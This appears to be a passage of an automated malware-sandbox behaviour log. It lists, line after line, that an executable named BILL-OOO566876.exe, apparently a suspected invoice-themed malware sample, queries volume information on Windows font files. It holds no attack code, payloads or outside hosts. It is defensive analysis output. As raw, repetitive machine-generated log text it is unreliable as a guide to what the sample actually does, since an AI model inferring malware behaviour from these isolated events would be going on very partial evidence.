                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
